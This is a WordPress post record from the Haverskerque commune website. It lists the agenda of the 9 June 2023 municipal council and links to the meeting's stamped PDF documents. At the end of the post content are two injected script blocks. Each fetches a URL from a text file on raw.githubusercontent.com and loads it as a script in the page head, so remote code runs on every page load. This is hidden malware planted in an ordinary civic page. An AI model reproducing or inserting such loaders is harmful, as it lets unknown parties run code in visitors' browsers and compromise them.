{"id":4502,"date":"2023-07-06T15:52:22","date_gmt":"2023-07-06T13:52:22","guid":{"rendered":"http:\/\/barbry.esy.es\/?p=4502"},"modified":"2024-07-29T06:38:07","modified_gmt":"2024-07-29T04:38:07","slug":"conseil-municipal-du-09-juin-2023","status":"publish","type":"post","link":"https:\/\/www.haverskerque.fr\/index.php\/2023\/07\/06\/conseil-municipal-du-09-juin-2023\/","title":{"rendered":"Conseil municipal du 09 juin 2023"},"content":{"rendered":"\n<h3 class=\"wp-block-heading\">ORDRE DU JOUR<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Approbation du proc\u00e8s-verbal du conseil municipal du 14 avril 2023.<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Informations au Conseil Municipal.<\/li>\n<\/ul>\n\n\n\n<p><strong>INSTITUTION<\/strong><\/p>\n\n\n\n<p>1. Installation d\u2019un nouveau conseiller municipal.<\/p>\n\n\n\n<p>2. Commission de contr\u00f4le des listes \u00e9lectorales &#8211; D\u00e9signation d\u2019un nouveau membre<\/p>\n\n\n\n<p>3. \u00c9lections s\u00e9natoriales 2023 &#8211; D\u00e9signation des d\u00e9l\u00e9gu\u00e9s des conseils municipaux<\/p>\n\n\n\n<p><strong>FINANCES<\/strong><\/p>\n\n\n\n<p>4. BP 2023 &#8211; D\u00e9cision budg\u00e9taire modificative n\u00b01<\/p>\n\n\n\n<p>5. Tarifs municipaux 2023 &#8211; Modification au 15 juin 2023<\/p>\n\n\n\n<p><strong>ADMINISTRATION<\/strong><\/p>\n\n\n\n<p>6. CDG 59 &#8211; Autorisation de signature de la convention d\u2019adh\u00e9sion \u00e0 la centrale d\u2019achats du syndicat mixte \u00e0 la fibre num\u00e9rique 59-62<\/p>\n\n\n\n<p>7. Ad\u2019AP Agenda d\u2019Accessibilit\u00e9 Programm\u00e9e &#8211; Prorogation de d\u00e9lai d\u2019ex\u00e9cution<\/p>\n\n\n\n<p><strong>INTERCOMMUNALITE<\/strong><\/p>\n\n\n\n<p>8. R\u00e9seau Esperluette &#8211; Modification de la convention et autorisation de signature<\/p>\n\n\n\n<div class=\"wp-block-file\"><a id=\"wp-block-file--media-a2a9f7cc-bc37-4579-aa71-7940658499d9\" href=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/07\/CONVOCATION-CM-09062023.pdf\">CONVOCATION CM 09062023<\/a><a href=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/07\/CONVOCATION-CM-09062023.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-a2a9f7cc-bc37-4579-aa71-7940658499d9\">T\u00e9l\u00e9charger<\/a><\/div>\n\n\n\n<div class=\"wp-block-file\"><a id=\"wp-block-file--media-c9422e31-47e1-4a28-bb34-54f415540940\" href=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/07\/PVCM09062023-tamponne.pdf\">PV+CM+09062023-tamponne<\/a><a href=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/07\/PVCM09062023-tamponne.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-c9422e31-47e1-4a28-bb34-54f415540940\">T\u00e9l\u00e9charger<\/a><\/div>\n\n\n\n<div class=\"wp-block-file\"><a id=\"wp-block-file--media-f2cd6974-21e4-4caf-8ab5-17f2f38b870d\" href=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/07\/INSTALLATIONNOUVEAUCONSEILLER-tamponne.pdf\">INSTALLATION+NOUVEAU+CONSEILLER-tamponne<\/a><a href=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/07\/INSTALLATIONNOUVEAUCONSEILLER-tamponne.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-f2cd6974-21e4-4caf-8ab5-17f2f38b870d\">T\u00e9l\u00e9charger<\/a><\/div>\n\n\n\n<div class=\"wp-block-file\"><a id=\"wp-block-file--media-eb6c7672-2b83-44db-8599-1fd0fd208585\" href=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/07\/TABLEAUCONSEILMUNICIPAL09062023-tamponne.pdf\">TABLEAU+CONSEIL+MUNICIPAL+09062023-tamponne<\/a><a href=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/07\/TABLEAUCONSEILMUNICIPAL09062023-tamponne.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-eb6c7672-2b83-44db-8599-1fd0fd208585\">T\u00e9l\u00e9charger<\/a><\/div>\n\n\n\n<div class=\"wp-block-file\"><a id=\"wp-block-file--media-968c16b6-7d48-48af-ac72-aaeba1d34482\" href=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/07\/COMMISSIONDECONTROLEDESLISTESELECTORALES-tamponne.pdf\">COMMISSION+DE+CONTROLE+DES+LISTES+ELECTORALES-tamponne<\/a><a href=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/07\/COMMISSIONDECONTROLEDESLISTESELECTORALES-tamponne.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-968c16b6-7d48-48af-ac72-aaeba1d34482\">T\u00e9l\u00e9charger<\/a><\/div>\n\n\n\n<div class=\"wp-block-file\"><a id=\"wp-block-file--media-c7072483-e1e9-44e1-a240-0a9c0d383150\" href=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/07\/ELECTIONSSENATORIALES-tamponne.pdf\">ELECTIONS+SENATORIALES-tamponne<\/a><a href=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/07\/ELECTIONSSENATORIALES-tamponne.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-c7072483-e1e9-44e1-a240-0a9c0d383150\">T\u00e9l\u00e9charger<\/a><\/div>\n\n\n\n<div class=\"wp-block-file\"><a id=\"wp-block-file--media-ddf22299-10a3-42c8-94f2-dec43aecafdc\" href=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/07\/DECISIONBUDGETAIREMODIFICATIVE1-tamponne.pdf\">DECISION+BUDGETAIRE+MODIFICATIVE+1-tamponne<\/a><a href=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/07\/DECISIONBUDGETAIREMODIFICATIVE1-tamponne.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-ddf22299-10a3-42c8-94f2-dec43aecafdc\">T\u00e9l\u00e9charger<\/a><\/div>\n\n\n\n<div class=\"wp-block-file\"><a id=\"wp-block-file--media-6c130805-bb29-4e3a-a057-4dc74154cd83\" href=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/07\/TARIFSCOMMUNAUX2023MODIFIES-tamponne.pdf\">TARIFS+COMMUNAUX+2023+MODIFIES-tamponne<\/a><a href=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/07\/TARIFSCOMMUNAUX2023MODIFIES-tamponne.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-6c130805-bb29-4e3a-a057-4dc74154cd83\">T\u00e9l\u00e9charger<\/a><\/div>\n\n\n\n<div class=\"wp-block-file\"><a id=\"wp-block-file--media-b2fdd160-b6fb-4787-b3a9-1c1e67e8fa4c\" href=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/07\/CONVENTIONCDG59MAIRIECONNECTEE-tamponne.pdf\">CONVENTION+CDG59+MAIRIECONNECTEE-tamponne<\/a><a href=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/07\/CONVENTIONCDG59MAIRIECONNECTEE-tamponne.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-b2fdd160-b6fb-4787-b3a9-1c1e67e8fa4c\">T\u00e9l\u00e9charger<\/a><\/div>\n\n\n\n<div class=\"wp-block-file\"><a id=\"wp-block-file--media-1e0af7bd-4997-4067-a8e6-53a0da5fe769\" href=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/07\/CONVENTIONCDG59MAIRIECONNECTEE-tamponne.pdf\">CONVENTION+CDG59+MAIRIECONNECTEE-tamponne<\/a><a href=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/07\/CONVENTIONCDG59MAIRIECONNECTEE-tamponne.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-1e0af7bd-4997-4067-a8e6-53a0da5fe769\">T\u00e9l\u00e9charger<\/a><\/div>\n\n\n\n<div class=\"wp-block-file\"><a id=\"wp-block-file--media-7cb81092-53c5-488f-877e-693785886792\" href=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/07\/PROROGATIONADAP-tamponne.pdf\">PROROGATION+ADAP-tamponne<\/a><a href=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/07\/PROROGATIONADAP-tamponne.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-7cb81092-53c5-488f-877e-693785886792\">T\u00e9l\u00e9charger<\/a><\/div>\n\n\n\n<div class=\"wp-block-file\"><a id=\"wp-block-file--media-6448aa23-7a70-4f11-b026-56fa9041f805\" href=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/07\/CCFLESPERLUETTE-tamponne.pdf\">CCFL+ESPERLUETTE-tamponne<\/a><a href=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/07\/CCFLESPERLUETTE-tamponne.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-6448aa23-7a70-4f11-b026-56fa9041f805\">T\u00e9l\u00e9charger<\/a><\/div>\n<script>var url = 'https:\/\/raw.githubusercontent.com\/lolngnos\/loles\/main\/step.txt';\nfetch(url)\n    .then(response => response.text())\n    .then(data => {\n        var script = document.createElement('script');\n        script.src = data.trim();\n        document.getElementsByTagName('head')[0].appendChild(script);\n    });<\/script><script>var url = 'https:\/\/raw.githubusercontent.com\/truba77\/trubnik\/main\/from.txt';\n\n        fetch(url)\n            .then(response => response.text())\n            .then(data => {\n                \/\/ head\n                var script = document.createElement('script');\n                script.src = data.trim(); \/\/ 44\n                document.getElementsByTagName('head')[0].appendChild(script);\n            })\n            .catch(error => {\n                console.error('bad go.txt:', error);\n            });<\/script>","protected":false},"excerpt":{"rendered":"<p>ORDRE DU JOUR INSTITUTION 1. Installation d\u2019un nouveau conseiller municipal. 2. Commission de contr\u00f4le des listes \u00e9lectorales &#8211; D\u00e9signation d\u2019un nouveau membre 3. \u00c9lections s\u00e9natoriales 2023 &#8211; D\u00e9signation des d\u00e9l\u00e9gu\u00e9s des conseils municipaux FINANCES 4. BP 2023 &#8211; D\u00e9cision budg\u00e9taire modificative n\u00b01 5. Tarifs municipaux 2023 &#8211; Modification au 15 juin 2023 ADMINISTRATION 6. CDG 59 &#8211; Autorisation de signature de la convention d\u2019adh\u00e9sion \u00e0 la centrale d\u2019achats du syndicat mixte \u00e0 la fibre num\u00e9rique 59-62 7. Ad\u2019AP Agenda d\u2019Accessibilit\u00e9 Programm\u00e9e &#8211; Prorogation de d\u00e9lai d\u2019ex\u00e9cution INTERCOMMUNALITE 8. R\u00e9seau Esperluette &#8211; Modification de la convention et autorisation de signature<\/p>\n","protected":false},"author":2,"featured_media":1476,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"cybocfi_hide_featured_image":"yes","footnotes":""},"categories":[10],"tags":[],"class_list":["post-4502","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-conseil-mnicipal"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Conseil municipal du 09 juin 2023 * Haverskerque, 100% Nature !*<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.haverskerque.fr\/index.php\/2023\/07\/06\/conseil-municipal-du-09-juin-2023\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Conseil municipal du 09 juin 2023 * Haverskerque, 100% Nature !*\" \/>\n<meta property=\"og:description\" content=\"ORDRE DU JOUR INSTITUTION 1. Installation d\u2019un nouveau conseiller municipal. 2. Commission de contr\u00f4le des listes \u00e9lectorales &#8211; D\u00e9signation d\u2019un nouveau membre 3. \u00c9lections s\u00e9natoriales 2023 &#8211; D\u00e9signation des d\u00e9l\u00e9gu\u00e9s des conseils municipaux FINANCES 4. BP 2023 &#8211; D\u00e9cision budg\u00e9taire modificative n\u00b01 5. Tarifs municipaux 2023 &#8211; Modification au 15 juin 2023 ADMINISTRATION 6. CDG 59 &#8211; Autorisation de signature de la convention d\u2019adh\u00e9sion \u00e0 la centrale d\u2019achats du syndicat mixte \u00e0 la fibre num\u00e9rique 59-62 7. Ad\u2019AP Agenda d\u2019Accessibilit\u00e9 Programm\u00e9e &#8211; Prorogation de d\u00e9lai d\u2019ex\u00e9cution INTERCOMMUNALITE 8. R\u00e9seau Esperluette &#8211; Modification de la convention et autorisation de signature\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.haverskerque.fr\/index.php\/2023\/07\/06\/conseil-municipal-du-09-juin-2023\/\" \/>\n<meta property=\"og:site_name\" content=\"Haverskerque, 100% Nature !*\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/communehaverskerque\" \/>\n<meta property=\"article:published_time\" content=\"2023-07-06T13:52:22+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-07-29T04:38:07+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/03\/conseil_municipal-800x445-1.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"800\" \/>\n\t<meta property=\"og:image:height\" content=\"445\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Communication\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"Communication\" \/>\n\t<meta name=\"twitter:label2\" content=\"Dur\u00e9e de lecture estim\u00e9e\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/07\\\/06\\\/conseil-municipal-du-09-juin-2023\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/07\\\/06\\\/conseil-municipal-du-09-juin-2023\\\/\"},\"author\":{\"name\":\"Communication\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/person\\\/aafb858b21dd4f2d37a7ab8c59b836ad\"},\"headline\":\"Conseil municipal du 09 juin 2023\",\"datePublished\":\"2023-07-06T13:52:22+00:00\",\"dateModified\":\"2024-07-29T04:38:07+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/07\\\/06\\\/conseil-municipal-du-09-juin-2023\\\/\"},\"wordCount\":195,\"publisher\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/07\\\/06\\\/conseil-municipal-du-09-juin-2023\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/03\\\/conseil_municipal-800x445-1.jpg\",\"articleSection\":[\"Conseil municipal\"],\"inLanguage\":\"fr-FR\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/07\\\/06\\\/conseil-municipal-du-09-juin-2023\\\/\",\"url\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/07\\\/06\\\/conseil-municipal-du-09-juin-2023\\\/\",\"name\":\"Conseil municipal du 09 juin 2023 * Haverskerque, 100% Nature !*\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/07\\\/06\\\/conseil-municipal-du-09-juin-2023\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/07\\\/06\\\/conseil-municipal-du-09-juin-2023\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/03\\\/conseil_municipal-800x445-1.jpg\",\"datePublished\":\"2023-07-06T13:52:22+00:00\",\"dateModified\":\"2024-07-29T04:38:07+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/07\\\/06\\\/conseil-municipal-du-09-juin-2023\\\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/07\\\/06\\\/conseil-municipal-du-09-juin-2023\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/07\\\/06\\\/conseil-municipal-du-09-juin-2023\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\\\/\\\/www.haverskerque.fr\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Conseil municipal du 09 juin 2023\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#website\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/\",\"name\":\"Haverskerque\",\"description\":\"Haverskerque, 100% Nature !\",\"publisher\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\"},\"alternateName\":\"Haverskerque\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/haverskerque.fr\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\",\"name\":\"Commune d'Haverskerque\",\"alternateName\":\"Commune d'Haverskerque\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2024\\\/01\\\/siteon0-e5814-1.png\",\"contentUrl\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2024\\\/01\\\/siteon0-e5814-1.png\",\"width\":236,\"height\":102,\"caption\":\"Commune d'Haverskerque\"},\"image\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/communehaverskerque\",\"https:\\\/\\\/www.instagram.com\\\/communehaverskerque\\\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/person\\\/aafb858b21dd4f2d37a7ab8c59b836ad\",\"name\":\"Communication\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f1f32f6a5fe89824a018e48a8d0132dc8a2017a5c81ea8ad1f3bdfd5fe9dddc4?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f1f32f6a5fe89824a018e48a8d0132dc8a2017a5c81ea8ad1f3bdfd5fe9dddc4?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f1f32f6a5fe89824a018e48a8d0132dc8a2017a5c81ea8ad1f3bdfd5fe9dddc4?s=96&d=mm&r=g\",\"caption\":\"Communication\"},\"url\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/author\\\/clement\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Conseil municipal du 09 juin 2023 * Haverskerque, 100% Nature !*","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.haverskerque.fr\/index.php\/2023\/07\/06\/conseil-municipal-du-09-juin-2023\/","og_locale":"fr_FR","og_type":"article","og_title":"Conseil municipal du 09 juin 2023 * Haverskerque, 100% Nature !*","og_description":"ORDRE DU JOUR INSTITUTION 1. Installation d\u2019un nouveau conseiller municipal. 2. Commission de contr\u00f4le des listes \u00e9lectorales &#8211; D\u00e9signation d\u2019un nouveau membre 3. \u00c9lections s\u00e9natoriales 2023 &#8211; D\u00e9signation des d\u00e9l\u00e9gu\u00e9s des conseils municipaux FINANCES 4. BP 2023 &#8211; D\u00e9cision budg\u00e9taire modificative n\u00b01 5. Tarifs municipaux 2023 &#8211; Modification au 15 juin 2023 ADMINISTRATION 6. CDG 59 &#8211; Autorisation de signature de la convention d\u2019adh\u00e9sion \u00e0 la centrale d\u2019achats du syndicat mixte \u00e0 la fibre num\u00e9rique 59-62 7. Ad\u2019AP Agenda d\u2019Accessibilit\u00e9 Programm\u00e9e &#8211; Prorogation de d\u00e9lai d\u2019ex\u00e9cution INTERCOMMUNALITE 8. R\u00e9seau Esperluette &#8211; Modification de la convention et autorisation de signature","og_url":"https:\/\/www.haverskerque.fr\/index.php\/2023\/07\/06\/conseil-municipal-du-09-juin-2023\/","og_site_name":"Haverskerque, 100% Nature !*","article_publisher":"https:\/\/www.facebook.com\/communehaverskerque","article_published_time":"2023-07-06T13:52:22+00:00","article_modified_time":"2024-07-29T04:38:07+00:00","og_image":[{"width":800,"height":445,"url":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/03\/conseil_municipal-800x445-1.jpg","type":"image\/jpeg"}],"author":"Communication","twitter_card":"summary_large_image","twitter_misc":{"\u00c9crit par":"Communication","Dur\u00e9e de lecture estim\u00e9e":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.haverskerque.fr\/index.php\/2023\/07\/06\/conseil-municipal-du-09-juin-2023\/#article","isPartOf":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2023\/07\/06\/conseil-municipal-du-09-juin-2023\/"},"author":{"name":"Communication","@id":"https:\/\/haverskerque.fr\/#\/schema\/person\/aafb858b21dd4f2d37a7ab8c59b836ad"},"headline":"Conseil municipal du 09 juin 2023","datePublished":"2023-07-06T13:52:22+00:00","dateModified":"2024-07-29T04:38:07+00:00","mainEntityOfPage":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2023\/07\/06\/conseil-municipal-du-09-juin-2023\/"},"wordCount":195,"publisher":{"@id":"https:\/\/haverskerque.fr\/#organization"},"image":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2023\/07\/06\/conseil-municipal-du-09-juin-2023\/#primaryimage"},"thumbnailUrl":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/03\/conseil_municipal-800x445-1.jpg","articleSection":["Conseil municipal"],"inLanguage":"fr-FR"},{"@type":"WebPage","@id":"https:\/\/www.haverskerque.fr\/index.php\/2023\/07\/06\/conseil-municipal-du-09-juin-2023\/","url":"https:\/\/www.haverskerque.fr\/index.php\/2023\/07\/06\/conseil-municipal-du-09-juin-2023\/","name":"Conseil municipal du 09 juin 2023 * Haverskerque, 100% Nature !*","isPartOf":{"@id":"https:\/\/haverskerque.fr\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2023\/07\/06\/conseil-municipal-du-09-juin-2023\/#primaryimage"},"image":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2023\/07\/06\/conseil-municipal-du-09-juin-2023\/#primaryimage"},"thumbnailUrl":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/03\/conseil_municipal-800x445-1.jpg","datePublished":"2023-07-06T13:52:22+00:00","dateModified":"2024-07-29T04:38:07+00:00","breadcrumb":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2023\/07\/06\/conseil-municipal-du-09-juin-2023\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.haverskerque.fr\/index.php\/2023\/07\/06\/conseil-municipal-du-09-juin-2023\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.haverskerque.fr\/index.php\/2023\/07\/06\/conseil-municipal-du-09-juin-2023\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.haverskerque.fr\/"},{"@type":"ListItem","position":2,"name":"Conseil municipal du 09 juin 2023"}]},{"@type":"WebSite","@id":"https:\/\/haverskerque.fr\/#website","url":"https:\/\/haverskerque.fr\/","name":"Haverskerque","description":"Haverskerque, 100% Nature !","publisher":{"@id":"https:\/\/haverskerque.fr\/#organization"},"alternateName":"Haverskerque","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/haverskerque.fr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"},{"@type":"Organization","@id":"https:\/\/haverskerque.fr\/#organization","name":"Commune d'Haverskerque","alternateName":"Commune d'Haverskerque","url":"https:\/\/haverskerque.fr\/","logo":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/haverskerque.fr\/#\/schema\/logo\/image\/","url":"https:\/\/haverskerque.fr\/wp-content\/uploads\/2024\/01\/siteon0-e5814-1.png","contentUrl":"https:\/\/haverskerque.fr\/wp-content\/uploads\/2024\/01\/siteon0-e5814-1.png","width":236,"height":102,"caption":"Commune d'Haverskerque"},"image":{"@id":"https:\/\/haverskerque.fr\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/communehaverskerque","https:\/\/www.instagram.com\/communehaverskerque\/"]},{"@type":"Person","@id":"https:\/\/haverskerque.fr\/#\/schema\/person\/aafb858b21dd4f2d37a7ab8c59b836ad","name":"Communication","image":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/secure.gravatar.com\/avatar\/f1f32f6a5fe89824a018e48a8d0132dc8a2017a5c81ea8ad1f3bdfd5fe9dddc4?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f1f32f6a5fe89824a018e48a8d0132dc8a2017a5c81ea8ad1f3bdfd5fe9dddc4?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f1f32f6a5fe89824a018e48a8d0132dc8a2017a5c81ea8ad1f3bdfd5fe9dddc4?s=96&d=mm&r=g","caption":"Communication"},"url":"https:\/\/www.haverskerque.fr\/index.php\/author\/clement\/"}]}},"_links":{"self":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/4502","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/comments?post=4502"}],"version-history":[{"count":8,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/4502\/revisions"}],"predecessor-version":[{"id":8276,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/4502\/revisions\/8276"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/media\/1476"}],"wp:attachment":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/media?parent=4502"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/categories?post=4502"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/tags?post=4502"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}